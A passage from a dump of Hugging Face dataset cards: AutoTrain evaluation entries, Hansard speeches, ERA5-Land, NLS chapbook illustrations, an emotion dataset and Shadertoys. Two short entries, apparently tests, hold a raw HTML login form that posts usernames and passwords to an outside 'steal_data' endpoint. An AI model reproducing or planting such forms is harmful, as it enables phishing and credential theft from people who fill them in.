] | 2022-07-22T14:10:40+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nbroad/xdistil-l12-h384-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:13:27+00:00 |
0513e0c12e945fa315e4fb166e3d741cb4413105 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@yjernite](https://huggingface.co/yjernite) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T14:51:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:54:17+00:00 |
ef655a3bfc18d977bb7d657ab87a6de404c883fc |
# Dataset Card for Hansard speech
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
  - [Data Fields](#data-fields)
  - [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** https://evanodell.com/projects/datasets/hansard-data/
- **Repository:** https://github.com/evanodell/hansard-data3
- **Paper:** [Needs More Information]
- **Leaderboard:** [Needs More Information]
- **Point of Contact:** [Evan Odell](https://github.com/evanodell)
### Dataset Summary
A dataset containing every speech in the House of Commons from May 1979 to July 2020. Quoted from the dataset homepage:
> Please contact me if you find any errors in the dataset. The integrity of the public Hansard record is questionable at times, and while I have improved it, the data is presented "as is".
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used to classify the transcribed speeches by time period or by speech type
- `language-modeling`: This dataset can contribute to the training or the evaluation of language models for historical texts.
### Languages
`en:GB`
## Dataset Structure
### Data Instances
```
{
'id': 'uk.org.publicwhip/debate/1979-05-17a.390.0',
'speech': "Since the Minister for Consumer Affairs said earlier that the bread price rise would be allowed, in view of developing unemployment in the baking industry, and since the Mother's Pride bakery in my constituency is about to close, will the right hon. Gentleman give us a firm assurance that there will be an early debate on the future of the industry, so that the Government may announce that, thanks to the price rise, those workers will not now be put out of work?",
'display_as': 'Eric Heffer',
'party': 'Labour',
'constituency': 'Liverpool, Walton',
'mnis_id': '725',
'date': '1979-05-17',
'time': '',
'colnum': '390',
'speech_class': 'Speech',
'major_heading': 'BUSINESS OF THE HOUSE',
'minor_heading': '',
'oral_heading': '',
'year': '1979',
'hansard_membership_id': '5612',
'speakerid': 'uk.org.publicwhip/member/11615',
'person_id': '',
'speakername': 'Mr. Heffer',
'url': '',
'government_posts': [],
'opposition_posts': [],
'parliamentary_posts': ['Member, Labour Party National Executive Committee']
}
```
### Data Fields
|Variable|Description|
|---|---|
|id|The ID as assigned by mysociety|
|speech|The text of the speech|
|display_as| The standardised name of the MP.|
|party|The party an MP is member of at time of speech|
|constituency| Constituency represented by MP at time of speech|
|mnis_id| The MP's Members Name Information Service number|
|date|Date of speech|
|time|Time of speech|
|colnum |Column number in hansard record|
|speech_class |Type of speech|
|major_heading| Major debate heading|
|minor_heading| Minor debate heading|
|oral_heading| Oral debate heading|
|year |Year of speech|
|hansard_membership_id| ID used by mysociety|
|speakerid |ID used by mysociety|
|person_id |ID used by mysociety|
|speakername| MP name as appeared in Hansard record for speech|
|url| link to speech|
|government_posts| Government posts held by MP (list)|
|opposition_posts |Opposition posts held by MP (list)|
|parliamentary_posts| Parliamentary posts held by MP (list)|
### Data Splits
Train: 2694375
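A minimal loading sketch (the decade filter is just one illustrative use of the `year` field described above):
```python
from datasets import load_dataset

ds = load_dataset("biglam/hansard_speech", split="train")

# `year` is stored as a string, so select the 1980s by prefix.
eighties = ds.filter(lambda x: x["year"].startswith("198"))
```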
## Dataset Creation
### Curation Rationale
This dataset contains all the speeches made in the House of Commons and can be used for a number of deep learning tasks, such as detecting how language and societal views have changed over the more than 40 years covered. The dataset also provides language closer to the spoken language used in an elite British institution.
### Source Data
#### Initial Data Collection and Normalization
The dataset was created by retrieving the data from [data.parliament.uk](http://data.parliament.uk/membersdataplatform/memberquery.aspx). There is no normalization.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
None
#### Who are the annotators?
[N/A]
### Personal and Sensitive Information
This is public information, so there should not be any personal and sensitive information
## Considerations for Using the Data
### Social Impact of Dataset
The purpose of this dataset is to understand how language use and society's views have changed over time.
### Discussion of Biases
Because of the long time period this dataset spans, it might contain language and opinions that are unacceptable in modern society.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
This dataset was built on top of [parlparse](https://github.com/mysociety/parlparse) by [Evan Odell](https://github.com/evanodell)
### Licensing Information
Creative Commons Attribution 4.0 International License
### Citation Information
```
@misc{odell_evan_2021,
title={Hansard Speeches 1979-2021: Version 3.1.0},
DOI={10.5281/zenodo.4843485},
abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>},
note={This release is an update of previously released datasets. See full documentation for details.},
publisher={Zenodo},
author={Odell, Evan},
year={2021},
month={May} }
```
Thanks to [@shamikbose](https://github.com/shamikbose) for adding this dataset. | biglam/hansard_speech | [
"task_categories:text-classification",
"task_categories:text-generation",
"task_ids:multi-class-classification",
"task_ids:language-modeling",
"task_ids:masked-language-modeling",
"annotations_creators:no-annotation",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:1M<n<10M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"speeches",
"politics",
"parliament",
"British",
"region:us"
] | 2022-07-22T20:57:59+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["expert-generated"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["1M<n<10M"], "source_datasets": ["original"], "task_categories": ["text-classification", "text-generation"], "task_ids": ["multi-class-classification", "language-modeling", "masked-language-modeling"], "pretty_name": "Hansard Speeches", "tags": ["speeches", "politics", "parliament", "British"]} | 2022-07-27T11:30:30+00:00 |
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
** test2 ** | testname/TestCard | [
"region:us"
] | 2022-07-23T01:14:50+00:00 | {} | 2022-07-23T01:27:28+00:00 |
4cbca4e0faa2eca2064f49fe5159723c276eb905 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | dsadasdad/tesfdjh | [
"region:us"
] | 2022-07-23T01:38:32+00:00 | {} | 2022-07-23T01:39:57+00:00 |
3a590f87db94258c732e8d8ce68d188697818991 |
This dataset comprises ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5 reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day and holds 24 timesteps. | openclimatefix/era5-land | [
"license:mit",
"region:us"
] | 2022-07-23T14:13:58+00:00 | {"license": "mit"} | 2022-12-01T12:38:35+00:00 |
36582224499cc4c4c364ddec6d5de46839e1c451 |
# Dataset Card for National Library of Scotland Chapbook Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/
- **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/
- **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf
- **Leaderboard:**
- **Point of Contact:** [email protected]
### Dataset Summary
This dataset comprises images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its [Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset.
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/)
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf).
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/)
### Supported Tasks and Leaderboards
- `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks
- `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
- `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/).
The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
| IOU threshold | Precision | Recall |
|---------------|-----------|--------|
| 0.50 | 0.993 | 0.911 |
| 0.75 | 0.987 | 0.905 |
| 0.95 | 0.973 | 0.892 |
The performance on the `image-classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
Images in the original dataset: 47329
Number of images on which at least one illustration was detected: 3629
Note that these figures do not reflect images that contained multiple detections.
See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
## Dataset Structure
### Data Instances
An example instance from the `illustration-detection` split:
```python
{'image_id': 4,
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'width': 600,
'height': 1080,
'objects': [{'category_id': 0,
'image_id': '4',
'id': 1,
'area': 110901,
'bbox': [34.529998779296875,
556.8300170898438,
401.44000244140625,
276.260009765625],
'segmentation': [[34.529998779296875,
556.8300170898438,
435.9700012207031,
556.8300170898438,
435.9700012207031,
833.0900268554688,
34.529998779296875,
833.0900268554688]],
'iscrowd': False}]}
```
An example instance from the `image-classification` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'label': 1}
```
An example from the `image-matching` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'group-label': 231}
```
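The `bbox` values follow COCO's `[x, y, width, height]` convention, which the `segmentation` polygon above confirms. A sketch for visualising one detection (assuming Pillow is installed):
```python
from PIL import ImageDraw
from datasets import load_dataset

ds = load_dataset("biglam/nls_chapbook_illustrations", "illustration-detection", split="train")
example = ds[0]

# Draw each detected illustration as a red rectangle on the page image.
image = example["image"].copy()
draw = ImageDraw.Draw(image)
for obj in example["objects"]:
    x, y, w, h = obj["bbox"]
    draw.rectangle([x, y, x + w, y + h], outline="red", width=3)
image.save("chapbook_detection.jpg")
```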
### Data Fields
The fields for the `illustration-detection` config:
- image_id: id for the image
- height: height of the image
- width: width of the image
- image: image of the chapbook page
- objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- bbox: bounding boxes for the images
- category_id: a label for the image
- image_id: id for the image
- iscrowd: COCO is a crowd flag
- segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the `image-classification` config:
- image: image
- label: a label indicating if the page contains an illustration or not
The fields for the `image-matching` config:
- image: image of the chapbook page
- group-label: an id for a particular instance of an image, i.e. matching images will share the same id.
### Data Splits
There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined.
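A sketch of that protocol over the single split (five folds are an assumption here; the paper's exact setup may differ):
```python
import numpy as np
from datasets import load_dataset
from sklearn.model_selection import KFold

ds = load_dataset("biglam/nls_chapbook_illustrations", "illustration-detection", split="train")

kf = KFold(n_splits=5, shuffle=True, random_state=0)
for fold, (train_idx, val_idx) in enumerate(kf.split(np.arange(len(ds)))):
    train_ds, val_ds = ds.select(train_idx), ds.select(val_idx)
    print(f"fold {fold}: {len(train_ds)} train / {len(val_ds)} val")
```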
## Dataset Creation
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/)
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/). No normalisation was performed; only the images and a subset of the metadata were used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA)](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312).
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficientDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
## Considerations for Using the Data
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
## Additional Information
### Dataset Curators
- Giles Bergel
- Abhishek Dutta
### Licensing Information
In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain.
### Citation Information
``` bibtex
@inproceedings{10.1145/3476887.3476893,
author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew},
title = {Visual Analysis of Chapbooks Printed in Scotland},
year = {2021},
isbn = {9781450386906},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3476887.3476893},
doi = {10.1145/3476887.3476893},
abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.},
booktitle = {The 6th International Workshop on Historical Document Imaging and Processing},
pages = {67–72},
numpages = {6},
keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset},
location = {Lausanne, Switzerland},
series = {HIP '21}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset. | biglam/nls_chapbook_illustrations | [
"task_categories:object-detection",
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:expert-generated",
"size_categories:1K<n<10K",
"license:other",
"lam",
"historic",
"arxiv:1405.0312",
"region:us"
] | 2022-07-23T20:05:40+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["object-detection", "image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "National Library of Scotland Chapbook Illustrations", "tags": ["lam", "historic"]} | 2023-02-15T16:11:54+00:00 |
6aa087d61c9aa8bb123ef1d8ecaac7b1bbd55d05 | Gpaiva/NERDE_sentences | [
"license:cc-by-4.0",
"region:us"
] | 2022-07-23T23:12:59+00:00 | {"license": "cc-by-4.0"} | 2022-07-23T23:22:44+00:00 |
|
76fcebe426935e35713fd378b3de34e05581578e | Pligabue/BLAB_KG | [
"license:mit",
"region:us"
] | 2022-07-24T02:52:47+00:00 | {"license": "mit"} | 2022-07-24T02:52:47+00:00 |
|
7b56660696f0df6adba35ef2d89e7bd549a2b409 |
An English-language Twitter message dataset covering six basic emotions (anger, fear, joy, love, sadness, and surprise).
GitHub link: https://github.com/dair-ai/emotion_dataset
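A minimal loading sketch with the `datasets` library is shown below; the split and field names are assumptions and should be checked against the loaded dataset.
```python
from datasets import load_dataset

# Split and field names ("train", "text", "label") are assumptions -- inspect the
# returned DatasetDict to confirm.
ds = load_dataset("ttxy/emotion")
print(ds["train"][0])
```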
| ttxy/emotion | [
"task_categories:text-classification",
"language:code",
"license:bsd",
"classification",
"region:us"
] | 2022-07-24T05:00:03+00:00 | {"language": ["code"], "license": "bsd", "task_categories": ["text-classification"], "pretty_name": "English Emotion classification", "tags": ["classification"]} | 2023-08-17T01:25:59+00:00 |
08ebcd44475da03e21fef856c051b8c98639ed6e | apoulos/Fork-test | [
"license:unknown",
"region:us"
] | 2022-07-24T05:05:16+00:00 | {"license": "unknown"} | 2022-07-24T05:05:16+00:00 |
|
17a36adb411ff1fea0d7dd861faa580e7839aac2 | apoulos/GFPGAN-fork | [
"license:unknown",
"region:us"
] | 2022-07-24T05:25:08+00:00 | {"license": "unknown"} | 2022-07-24T05:25:08+00:00 |
|
0bafa7af1ec5ff70f682f40196ebc18708f8d27f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:20:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/minilm-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:23:49+00:00 |
0012c270d0bd91ea80c924aa6dfdf9358394daa2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-6l-768d", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:16+00:00 |
446bb59eac4bc07d261513dd87c75cc14d00df1b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:57+00:00 |
4eda02d5543e62650c00f8abd5b0cc1335b03088 | The Climate Change MRC dataset (CCMRC) is part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted in the "AI for Good" special system demonstration track at IJCAI-ECAI 2022.
If you use the dataset, cite the following paper:
```
@inproceedings{rony2022climatemrc,
title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.},
author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens},
booktitle={IJCAI},
year={2022}
}
```
| rony/climate-change-MRC | [
"license:mit",
"region:us"
] | 2022-07-24T10:22:03+00:00 | {"license": "mit"} | 2022-07-25T05:14:09+00:00 |
6e047a1b02a1865e862da10fde74d21396ed845d | ntmkhanh/recipe | [
"license:apache-2.0",
"region:us"
] | 2022-07-24T11:59:52+00:00 | {"license": "apache-2.0"} | 2022-07-24T11:59:52+00:00 |
|
796cb315ae0a504ac1b731a93216e019c2cd59a1 |
# Dataset Card for Shadertoys
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the Shadertoy.com API. Some shader programs contain multiple render passes.
To browse a subset of this dataset, look at the [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderCoder) space. A finer-grained variant of this dataset is [Shadertoys-fine](https://huggingface.co/datasets/Vipitis/Shadertoys-fine).
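As a minimal sketch, the dataset can be loaded with the `datasets` library (split names follow the Data Splits section below):
```python
from datasets import load_dataset

# Each row is a single renderpass; see the Data Fields section for the full schema.
shaders = load_dataset("Vipitis/Shadertoys", split="train")
print(shaders[0]["name"], shaders[0]["type"])
```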
### Supported Tasks and Leaderboards
`text-generation`: the dataset can be used to train generative language models for code-completion tasks.
`ShaderEval`: [task1](https://huggingface.co/spaces/Vipitis/ShaderEval) of ShaderEval uses a dataset derived from Shadertoys to test return-statement completion with autoregressive language models.
### Languages
- English (title, description, tags, comments)
- Shadercode **programming** language, a subset of GLSL specifically for Shadertoy.com
## Dataset Structure
### Data Instances
A data point consists of the whole shader code of one renderpass, some information from the API, and additional metadata.
```
{
'num_passes': 1,
'has_inputs': False,
'name': 'Image',
'type': 'image',
'code': '<full code>',
'title': '<title of the shader>',
'description': '<description of the shader>',
'tags': ['tag1','tag2','tag3', ... ],
'license': 'unknown',
'author': '<username>',
'source': 'https://shadertoy.com/view/<shaderID>'
}
```
### Data Fields
- 'num_passes': number of passes the parent shader program has
- 'has_inputs': whether any inputs were used, such as textures or audio streams
- 'name': name of the renderpass, usually Image, Buffer A, Common, etc.
- 'type': type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}`
- 'code': the raw code (including comments) of the whole renderpass
- 'title': name of the shader
- 'description': description given for the shader
- 'tags': list of tags assigned to the shader (by its creator); there are more than 10000 unique tags
- 'license': currently in development
- 'author': username of the shader author
- 'source': URL to the shader (not to the specific renderpass)
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2); the items in each shader's 'renderpass' list were then iterated over, adding selected fields from 'info'.
The code used to generate these datasets should be published in the GitHub repository in the near future.
#### Who are the source language producers?
Shadertoy.com contributors who publish shaders as 'public+API'.
## Licensing Information
The default [license for each shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some shaders might have a different license attached.
The dataset does not currently filter by license, but a license tag is provided where one is easily recognizable by naive means.
Please check the first comment of each shader program yourself so as not to violate any copyrights in downstream use. The main license requires attribution and share-alike.
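A naive scan of the opening comment lines for license keywords might look like the following sketch (the keyword list is an illustrative assumption, not an exhaustive test):
```python
# Naive license scan: look for common license keywords near the top of a shader.
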